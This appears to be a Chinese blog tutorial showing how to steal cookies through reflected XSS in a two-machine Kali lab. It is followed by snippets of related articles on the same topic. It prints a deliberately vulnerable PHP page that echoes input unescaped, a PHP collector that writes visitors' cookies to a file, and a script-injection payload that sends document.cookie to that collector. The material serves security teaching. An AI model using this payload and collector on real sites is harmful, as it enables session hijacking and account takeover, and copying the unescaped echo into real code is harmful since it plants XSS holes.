XSS窃取cookie

最新推荐文章于 2025-03-19 20:21:04 发布
原创 最新推荐文章于 2025-03-19 20:21:04 发布 · 3.1k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #linux

目录

一、准备

二、环境搭建

1.主机环境搭建

2.靶机环境搭建

三、测试

一、准备

1.kali主机

2.kali靶机

如未安装kali,可参考以下链接:

Kali Linux 安装过程 超详细(图文并茂,通用版)_好好学习-优快云博客_kali安装教程

二、环境搭建

1.主机环境搭建

为避免测试过程出现权限问题,我们以root用户登录

 我们进入文件路径var/www/html的文件夹下

 创建两个php文件,分别命名为:

submit.php
hack.php

 打开submit.php,输入以下文本并保存关闭

<?php
session_start();
?>
<!doctype html>
<html>
    <head>
        <title>XSS Demo</title>
    </head>
    <body>
    <form>
    <input style="width:300px;" type="text" name="address1" value="<?php echo $_GET["address1"]; ?>" />
            <input type=submit value=submit />
        </form>
    </body>
</html>

 

打开hack.txt,输入以下文本并保存关闭

<?php
$victim = 'XXS get the cookie:'. $_SERVER['REMOTE_ADDR']. ':' .$_GET['cookie'];
file_put_contents('1.txt', $victim);
echo welcome;

 打开kali主机终端,执行以下命令:

service apache2 start

2.靶机环境搭建

确保靶机与主机是在同一网段即可。

三、测试

kali靶机打开终端,执行以下命令:

ifconfig

查看到靶机ip地址:192.168.234.139

 执行以下命令:

nmap 192.168.234.0/24

以此扫描该网段下所有主机,发现靶机ip地址:192.168.234.128

打开浏览器,在地址栏输入以下链接并进入

http://192.168.234.128/submit.php

在网页上输入以下字段并单击“submit”

"/> <script>window.open("http://192.168.234.128/hack.php?cookie="+document.cookie);</script><!--

 发现网页发生了跳转,新网页显示着“welcome”

 我们返回kali主机,发现在目录var/www/html下生成了一个“1.txt”文件

 打开“1.txt”文件,发现存在内容,说明测试成功

inskeyzh
关注
【网络安全XSSCookie外带攻击姿势及例题详析
等风来
05-19 9334
XSSCookie 外带攻击就是一种针对 Web 应用程序中的 XSS(跨站脚本攻击)漏洞进行的攻击,攻击者通过在 XSS 攻击中注入恶意脚本,从而窃取用户的 Cookie 信息。攻击者通常会利用已经存在的 XSS 漏洞,在受害者的浏览器上注入恶意代码,并将受害者的 Cookie 数据上传到攻击者控制的服务器上,然后攻击者就可以使用该 Cookie 来冒充受害者,执行一些恶意操作,例如盗取用户的账户信息、发起钓鱼攻击等。
xss Cookie
10-09
xss利用工具 Cookie
XSS获取COOKIE
04-20
XSS获取COOKIE
XSS(偷你的Cookies)
热门推荐
qq_27552077的博客
03-12 1万+
XSS(Cross Site Scripting),跨站脚本攻击,取名XSS是避免和CSS同名。XSS攻击原理:攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当其它用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的。同时这也因为HTTP采用的明文模式,这样就让黑客有机可乘了(在我另一篇文章介绍过利用fiddle可以捕获HTTP报文)。我发现网上很多关于XSS攻击的文章都没
简单的利用XSS获取用户cookie
shy的博客
10-25 4695
跨站脚本攻击(XSS) 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 这里简单的演示下,将cookie获取到自己的搭...
XSS攻击——cookie
qq_46277212的博客
06-23 2018
cookie概述 cookie是一些数据,存储于用户电脑上的文本文件中。当web服务器向浏览器发送web页面时,在连接关闭后,服务器不会记录用户的信息。cookie的作用就是用于解决“如何记录客户端的用户信息”。 当用户访问web页面时,用户名可以记录在cookie中。 在用户下一次访问该页面时,可以在cookie中读取用户访问记录。 cookie以键值对形式存储。如 username=baixiaomao; 当浏览器从服务器上请求web页面时,属于该页面的cookie会被添加到该请求中。服务器端通过
XSS漏洞】XSS攻击平台-窃取Cookie
muyuchen110的博客
07-23 986
XSS漏洞基础:XSS 攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS) 的缩写混淆,故将跨站脚本攻击缩写为 XSSXSS 是⼀种在 web 应⽤中的计算机安全漏洞,它允许恶意web⽤户将代码植⼊到 web ⽹站⾥⾯,供给其它⽤户访问,当⽤户访问到有恶意代码的⽹⻚就会产⽣ xss 攻击;漏洞概念:⽬标未对⽤户从前端功能点输⼊的数据与输出的内容未进⾏处理或者处理不当,从⽽导致恶意的JS代码被执⾏造成窃取⽤户信息劫持WEB⾏为危害的。
XSS-窃取Cookie及拓展
2301_76631050的博客
07-23 2137
步骤一:来到xss平台 点击公共模块---flash弹窗钓⻥-查看将其中的代码保存成⼀个js⽂件放到我们⽹站的根⽬录下⾯。步骤二:用记事本打开1.js 修改js中的这⼀⾏代码,改成我们伪造的flash⽹站⽹址。步骤七:点击"设置"--"解压后运⾏"如下两⾏内容...并在"模式"标签下设置"全部隐藏"...步骤⼋:配置更新⽅式----》解压并更新⽂件⽽覆盖⽅式----覆盖所有⽂件!步骤二:在我的项目中选择我们刚创建的项目,点击右上角的查看配置代码。把文件复制到我们网站的根目录下。
利用XSS窃取Cookie的有效负载生成工具
XSS攻击中窃取cookie是一个常见的攻击方式,攻击者通过XSS脚本获取用户的会话cookie,然后利用这些cookie在未授权的情况下访问用户的账户。 #### 使用Python脚本实现 该工具是用Python 2编写的,可以通过执行`...
[网络安全]XSSCookie外带攻击姿势详析
Hacker_LaoYi的博客
02-13 1116
给小伙伴们的意见是想清楚,自学网络安全没有捷径,相比而言系统的网络安全是最节省成本的方式,因为能够帮你节省大量的时间和精力成本。坚持住,既然已经走到这条路上,虽然前途看似困难重重,只要咬牙坚持,最终会收到你想要的效果。黑客工具&SRC技术文档&PDF书籍&web安全等(可分享)网络安全产业就像一个江湖,各色人等聚集。
利用XSS窃取用户Cookie
Monsterlz123的博客
07-20 7800
XSS】利用XSS窃取用户Cookie Hello,各位小伙伴周六愉快。 晃眼之间一周又快要过去了,时间是不等人滴~~ 这周准备连发三篇XSS相关内容,两篇实战,一篇总结。 然后XSS漏洞部分就暂时完结啦~~ 今天我们来看看怎么利用XSS窃取用户cookie吧。 一、实验概述 实验拓扑: XSS的用途之一就是窃取用户的cookie,攻击者利用XSS在网站中插入恶意脚本,一旦用户访问该网页...
利用 XSS 获取 Cookie 利用DOM XSS
weixin_71416901的博客
06-21 1534
XSS
XSS获取Cookie实验
最新发布
zj2084的博客
03-19 3081
攻击者服务器:192.168.112.183,将获取到Cookie数据保存到该服务器的数据库中,运行PHP代码暴露一个接收Cookie的URL地址。正常Web服务器:192.168.112.188,用于正常的用户访问的目标站点,用户可以在上面阅读或者发表文章。用户浏览器:192.168.112.1,Windows环境,使用Chrome浏览器。攻击者浏览器:192.168.112.1,Windows环境,使用Firefox浏览器。
利用XSS漏洞打cookie
qq_68163788的博客
01-15 2694
XSS漏洞是一种跨站脚本攻击,攻击者可以在受害者的浏览器中注入恶意脚本,从而获取用户的敏感信息,如cookie。 当受害者访问包含恶意脚本的页面时,恶意脚本会获取受害者的cookie信息,并将其发送到攻击者的服务器。攻击者可以利用这些cookie信息来冒充受害者进行各种操作,比如登录受害者的账户。为了防止XSS漏洞,网站开发者应该对用户输入进行严格的过滤和验证,避免将未经验证的用户输入直接输出到页面上。另外,网站可以使用XSS防护工具或者采用安全的编程实践来防止XSS漏洞的发生。
网安入门17-XSS(打Cookie
m0_61499194的博客
02-27 1746
来到这个实战网站,两个浏览器注册两个账号zyh666,和zyh999,由于同源策略,Edge和火狐登录同一URL不共享cookie。接下来开始攻击,假设这个钓鱼链接被zyh999点击,那么我们就收到了zyh999的Cookie!此时4个步骤以及完成了第一步,接下来的中间人可以选择一个云服务器,也可以用一个XSS平台。反射型也是一样的,在Edge中存好,用Chrome打开,弹的是两个不同的Cookie。查看代码选项,恶意JS选择第一条payload复制到网站的URL中,构造钓鱼链接。实战打Cookie成功。
XSS实现cookie盗取
一期一会的博客
04-08 1247
XSS实现cookie盗取 在一台win7上搭建xss,另外一台搭建留言板(一个网站),两台虚拟机之间能够ping通,在留言板上留言,管理员回复留言,xss上获取到cookie,利用中国菜刀通过获取的cookie用管理员账号登录。 实验环境: ​ Windows 7 192.168.1.128 (搭建xss) ​ Windows 7 192.168.1.100 (安装小旋风) xss平台搭建好以后,进入管理员账户,复制邀请码,退出登录,利用邀请码重新注册一个test11的账户
网络安全学习笔记——盗取Cookies跨站脚本(XSS
just do it
07-24 2797
使用替换过了的URL发给目标,诱导目标点击,然后目标的cookies就会回弹到XSS攻击平台上,展开就可以看到该目标的PHPSESSID,然后在自己的同源网站上,笔记本按Fn+F12,调出Hackerbar,点击存储,然后把PHPSESSID换成攻击之后得到的,删掉浏览框里面多余的东西,剩下XXX.php即可,刷新之后就会登录该目标的账号——,SESSID——中间键,是Apache分配的,唯一的“身份证”,从SESSID入手,就可以查取用户的相关信息。
XSS获取目标cookie,伪造身份获取目标权限
qq_57663276的博客
08-23 3433
未知攻,何来防。网络安全靶场学习:XSS(跨站脚本攻击),使用XSS伪造目标权限。
3-5通过XSS获取cookie以及XSS后台管理系统的使用
山兔的博客
04-23 4070
XSS漏洞测试:cookie获取和钓鱼攻击演示  XSS漏洞测试:cookie窃取和利用 同时讲到get型xss的利用,post型xss的利用  XSS漏洞测试:钓鱼攻击  XSS漏洞测试:xss获取用户键盘记录 让大家更好的理解xss的危害以及原理 案例1:xss如何获取cookie? GET型XSS利用:cookie获取 pkxss管理后台使用介绍 在源码包里面,有一个pkxss,我们可以把这个目录,单独的放在某个目录下面,这个东西其实是一个可以独立使用的后台,我们可以单独的把他放在站点目录下
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值